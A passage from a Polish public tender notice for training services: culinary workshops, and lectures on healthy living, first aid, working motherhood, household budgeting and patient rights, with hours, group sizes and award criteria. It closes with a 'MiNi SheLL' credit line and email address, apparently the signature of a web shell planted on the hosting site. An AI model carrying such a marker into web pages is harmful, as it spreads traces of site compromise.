Prawo cywilne i handlowe
Typowe umowy cywilne
Wybór formy opodatkowania
Systemy podatkowe ewidencyjne, sprawozdawcze
2)Rachunkowość i podatki
Formy opodatkowania działalności gospodarczej
Dowody księgowe
Obowiązek prowadzenia Podatkowej Księgi Przychodów i Rozchodów
Zasady dokonywania zapisów w Podatkowej Księgi Przychodów i Rozchodów
Deklaracje podatkowe - miesięczne i roczne rozliczenia z Urzędem Skarbowym
Podstawa opodatkowania i stawki podatkowe
Podatek od towarów i usług ( VAT)
Sprzedaż i fakturowanie
Ubezpieczenia społeczne
3)Biznesplan
Biznes plan - zasady tworzenia;
Narzędzia zarządzania
Znaczenie Biznes planu
Możliwości wykorzystania
Weryfikacja poprawności własnego planu działania 
Wsparcie dla przedsiębiorców z Funduszy Strukturalnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług z zakresu warsztatów kulinarnych dla 1 grupy liczącej do 15 osób, w łącznym wymiarze 30 godzin. Warsztaty mają obejmować: 24 godziny zajęć praktycznych i 6 godziny teoretycznych (6 spotkań po 5 godzin).
Warsztaty mają na celu m.in:
zwiększenie wiedzy uczestników na temat zasad zdrowego żywienia,
zdobycie praktycznych umiejętności sztuki kulinarnej.
Program warsztatów ma obejmować m.in. następujące zagadnienia:
Przybliżenie zasad zdrowego żywienia
Dobór produktów sezonowych do przygotowywania potraw, dobieranie rodzajów mięs do potraw
Metody i sposoby gotowania
Przyrządzanie potraw i przystawek wykorzystując dostępne na rynku mięsa, ryby, nabiał i warzywa
Prezentacja potraw..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV zamówienia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług z zakresu:
1.Prelekcji na temat zdrowego stylu życia i dbałości o zdrowie dla 4 grup liczących od 10 do 15 osób, w łącznym wymiarze 22 godzin:
2 grupy po 4 godziny,
1 grupa po 5 godzin, 
1 grupa - 9 godzin (3 spotkania po 3 godziny).
Celem prelekcji jest edukacja i uświadomienie uczestników spotkań na temat zdrowego stylu życia i dbania o własne zdrowie. 
Program prelekcji powinien obejmować m.in. następujące zagadnienia:
Zdrowie - definicja według Światowej Organizacji Zdrowia oraz definicja pojęcia Zdrowy styl życia,
Dbałość o zdrowie w aspekcie: medycznym, prawidłowego odżywiania (diety), dbałości o higienę ciała, włosów i skóry.,
Odżywianie zgodne z piramidą zdrowia, zagrożenia dla zdrowia wynikające z rozwoju cywilizacyjnego,
Wzorce prawidłowej higieny ciała człowieka, aktywność fizyczna, relaks, zagrożenia słoneczne, zapachowe, detergenty,
Unikanie palenia papierosów, używania narkotyków itp. dbałość o zdrowie psychiczne.

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe w kierunku: dietetyka lub medycyna lub pielęgniarstwo, a także doświadczenie z zakresu prowadzenia zajęć grupowych lub prelekcji lub wykładów.

2.Preselekcji z zakresu pierwszej pomocy przedlekarskiej dla 1 grupy liczącej do 10 osób w łącznym wymiarze 4 godzin. 
Celem prelekcji jest przybliżenie uczestnikom spotkania czynności jakie należy wykonać w razie wypadku, urazu lub nagłego ataku choroby w celu ochrony życia lub zdrowia poszkodowanego oraz zminimalizowania niekorzystnych następstw zanim będzie możliwe udzielenie specjalistycznej pomocy medycznej. 
Program prelekcji ma obejmować m.in. następujące zagadnienia:
Podstawowe wiadomości z zakresu budowy i funkcjonowania organizmu ludzkiego;
Najczęściej spotykane urazowe i nieurazowe stany zagrożenia życia;
Oparzenia, odmrożenia, urazy otwarte i urazy zamknięte;
Resuscytacja bez przyrządowa dzieci i dorosłych, zatamowanie krwotoków i działanie przeciwwstrząsowe,
ułożenie poszkodowanego w pozycji bezpiecznej.

Osoby prowadzące prelekcje powinny posiadać wyższe wykształcenie, a także uprawnienia do prowadzenia szkoleń z zakresu udzielania pierwszej pomocy i bhp lub posiadać kwalifikacje ratownika medycznego, oraz posiadać doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów.

3.Prelekcji Jak być mamą i pracować dla 1 grupy liczącej do 15 osób w łącznym wymiarze 24 godzin (4 spotkania po 6 godzin).
Celem prelekcji jest przygotowanie młodych matek, które po okresie macierzyństwa mają wyjść z domu, podjąć zatrudnienie do pozostawienia dziecka pod opieką innych osób oraz radzenia sobie jednocześnie w roli matki i pracownika. 
Program prelekcji obejmuje następujące zagadnienia:
Problem rozstania - przygotowanie zarówno matki jak i dziecka do wzajemnej nieobecności, przygotowanie dziecka do pozostania w domu z inną, obcą osobą, przygotowanie dziecka do pójścia do przedszkola,
Kodeks pracy: przywileje i uprawnienia pracującej mamy, nieletni w świetle prawa,
przygotowanie do rozmowy w sprawie pracy, jak pogodzić obowiązki dobrej mamy i dobrego pracownika, 
wybór właściwej opieki nad dzieckiem w czasie nieobecności mamy, jak i gdzie szukać oraz jak sprawdzić kompetencje opiekunki do dzieci, przygotowanie do rozmowy z opiekunką. 

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe w kierunku: psycholog lub prawnik lub doradca zawodowy bądź też ukończone studia podyplomowe w kierunku doradca zawodowy, a także posiadać doświadczenie zawodowe w prowadzeniu prelekcji lub i wykładów.

4.Prelekcji z zakresu zarządzania własnymi zasobami dla 1 grupy liczącej do 15 osób w łącznym wymiarze 12 godzin (2 spotkania po 6 godzin).
Celem prelekcji jest zdobycie przez uczestników spotkania umiejętności organizacyjnych związanych z planowaniem czasu i wykonywaniem codziennych obowiązków, a także planowaniem wydatków i zarządzaniem domowym budżetem. 
Program prelekcji ma obejmować m.in. następujące zagadnienia:
Zarządzanie budżetem domowym, planowanie wydatków i gromadzenie zasobów na wydatki okazjonalne. Co i gdzie kupować? Jak czytać ceny? Jak podejmować decyzje zakupowe?
Planowanie czasu wolnego sobie i dzieciom, planowanie urlopu,
Przygotowanie harmonogramu codziennych obowiązków, dzielenie obowiązków domowych z życiowym partnerem,
Jak wykorzystać w życiu codziennym zasoby środowiska zamieszkania (pomoc sąsiedzka, koleżeńska itp.).

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe oraz doświadczenie zawodowe w prowadzeniu zajęć grupowych lub/i prelekcji lub/i wykładów.

5.Prelekcji na temat praw pacjenta w zakresie dostępności do świadczeń zdrowotnych finansowanych z Narodowego Funduszu Zdrowia dla 1 grupy liczącej do 15 osób w łącznym wymiarze 4 godzin (1 spotkanie). 
Celem prelekcji jest zwiększenie wiedzy uczestników na temat praw pacjenta oraz możliwości i procedur korzystania z usług państwowej służby zdrowia. 
Program prelekcji ma obejmować m.in. następujące zagadnienia: 
prawa pacjenta w świetle ustawy o prawach pacjenta i Rzeczniku Praw Pacjenta,
zakres usług świadczonych przez lekarza pierwszego kontaktu (rodzinnego),
dostępność do badań profilaktycznych i specjalistycznej opieki medycznej,
informacje na temat zasad korzystania z usług sanatoryjnych dla dzieci oraz opiekunów.

Osoby prowadzące prelekcje powinny posiadać wykształcenie wyższe: prawnicze lub administracyjne lub medyczne, a także doświadczenie zawodowe w prowadzeniu zajęć grupowych lub i prelekcji lub i wykładów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com